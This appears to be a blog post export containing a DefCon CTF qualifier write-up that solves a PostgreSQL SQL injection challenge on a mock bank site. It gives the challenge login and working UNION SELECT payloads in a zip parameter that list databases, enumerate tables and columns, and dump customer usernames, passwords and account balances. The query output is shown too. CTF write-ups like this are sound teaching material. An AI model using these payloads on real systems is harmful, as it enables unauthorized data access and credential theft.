{"id":340,"date":"2012-06-03T21:04:19","date_gmt":"2012-06-04T02:04:19","guid":{"rendered":"http:\/\/www.rajatswarup.com\/blog\/?p=340"},"modified":"2013-01-19T10:52:54","modified_gmt":"2013-01-19T15:52:54","slug":"defcon-ctf-quals-grabbag400-writeup","status":"publish","type":"post","link":"https:\/\/www.rajatswarup.com\/blog\/2012\/06\/03\/defcon-ctf-quals-grabbag400-writeup\/","title":{"rendered":"DefCon CTF Quals GrabBag400 Writeup"},"content":{"rendered":"

This was an interesting PostgreSQL injection challenge.
\nWhat is Jeff Moss’ checking account balance?
\nBank Site – http:\/\/140.197.217.85:8080\/boa_bank<\/a>
\nUser:blacksheep
\nPassword:luvMeSomeSheep<\/p>\n

The username and password is to get around the .htaccess that protects the site. There was a page with the zip code search on it. The zip parameter was vulnerable to SQL injection (verified by entering a ‘ character in the zip parameter). With this information you <\/p>\n

SQL injection in zip parameter. http:\/\/140.197.217.85:8080\/boa_bank\/find_branch.jsp?zip=5%20or%201=1–&Submit.x=0&Submit.y=0<\/a><\/p>\n

List of databases can be found by: http:\/\/140.197.217.85:8080\/boa_bank\/find_branch.jsp?zip=5%20%20union%20SELECT%20datname,datname,datname,datname,1,datname%20FROM%20pg_database&Submit.x=0&Submit.y=0<\/a><\/p>\n

Names of databases
\n——————
\ntemplate1
\ntemplate0
\npostgres
\nboa_bank<\/p>\n

http:\/\/140.197.217.85:8080\/boa_bank\/find_branch.jsp?zip=5%20%20union%20SELECT%20relname,A.attname,relname,A.attname,1,relname%20FROM%20pg_class%20C,pg_namespace%20N,pg_attribute%20A,pg_type%20T%20WHERE%20(C.relkind=’r’)%20AND%20(N.oid=C.relnamespace)%20AND%20(A.attrelid=C.oid)%20AND%20(A.atttypid=T.oid)%20AND%20(A.attnum%3E0)%20AND%20(NOT%20A.attisdropped)%20AND%20(N.nspname%20ILIKE%20’public’)&Submit.x=0&Submit.y=0<\/a><\/p>\n

With this query it’s easy to evaluate the type of the parameter as well as the position. This was done by the error message that indicated an “int cannot be compared to text”. <\/p>\n

Table,column_name
\n—————–
\ntransaction,amount
\ntransaction,account
\ntransaction,id
\ntransaction,date
\nbranch,id
\nbranch,zip
\nbranch,city
\nbranch,name
\nbranch,street
\nbranch,phone
\nbranch,state
\ncustomer,id
\ncustomer,firstname
\ncustomer,password
\ncustomer,lastname
\ncustomer,username
\ncustomer,email
\naccount,id -> int
\naccount,owner -> int
\naccount,account -> string
\naccount,balance
\naccount,type -> checking\/savings
\nsqlmapfile,data
\ntest2234,t
\nhkk,t
\nmydata,t
\nmytable,mycol
\nhk,hk
\nsonic,sonic<\/p>\n

Getting all customers (Jeff Moss can’t be found in the list though)
\nhttp:\/\/140.197.217.85:8080\/boa_bank\/find_branch.jsp?zip=5%20%20union%20SELECT%20C.firstname,C.lastname,C.username,C.password,1,C.email%20FROM%20customer%20C&Submit.x=0&Submit.y=0
\nLots of complaints were heard that the record wasn’t present for Jeff Moss. But if you just filtered by ‘checking’ account, you would see that it was all the same for all users. The following query gives the list of all checking accounts…but if you notice the value is $0.00 for all checking accounts so Jeff Moss’ account should be 0.00 too!!! <\/p>\n

http:\/\/140.197.217.85:8080\/boa_bank\/find_branch.jsp?zip=5%20%20union%20SELECT%20A.account,A.type,A.type,cast(A.balance%20as%20text),A.owner,A.account%20FROM%20account%20A%20where%20A.type%20ILIKE%20’checking’&Submit.x=0&Submit.y=0
\n<\/a><\/p>\n

Fun times!<\/p>\n","protected":false},"excerpt":{"rendered":"

This was an interesting PostgreSQL injection challenge. What is Jeff Moss’ checking account balance? Bank Site – http:\/\/140.197.217.85:8080\/boa_bank User:blacksheep Password:luvMeSomeSheep The username and password is to get around the .htaccess that protects the site. There was a page with the zip code search on it. The zip parameter was vulnerable to SQL injection (verified by […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[230],"tags":[222,224,449,223,227],"class_list":["post-340","post","type-post","status-publish","format-standard","hentry","category-howto","tag-ctf","tag-defcon","tag-postgresql","tag-quals","tag-sql-injection"],"_links":{"self":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts\/340","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/comments?post=340"}],"version-history":[{"count":4,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts\/340\/revisions"}],"predecessor-version":[{"id":369,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts\/340\/revisions\/369"}],"wp:attachment":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/media?parent=340"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/categories?post=340"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/tags?post=340"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}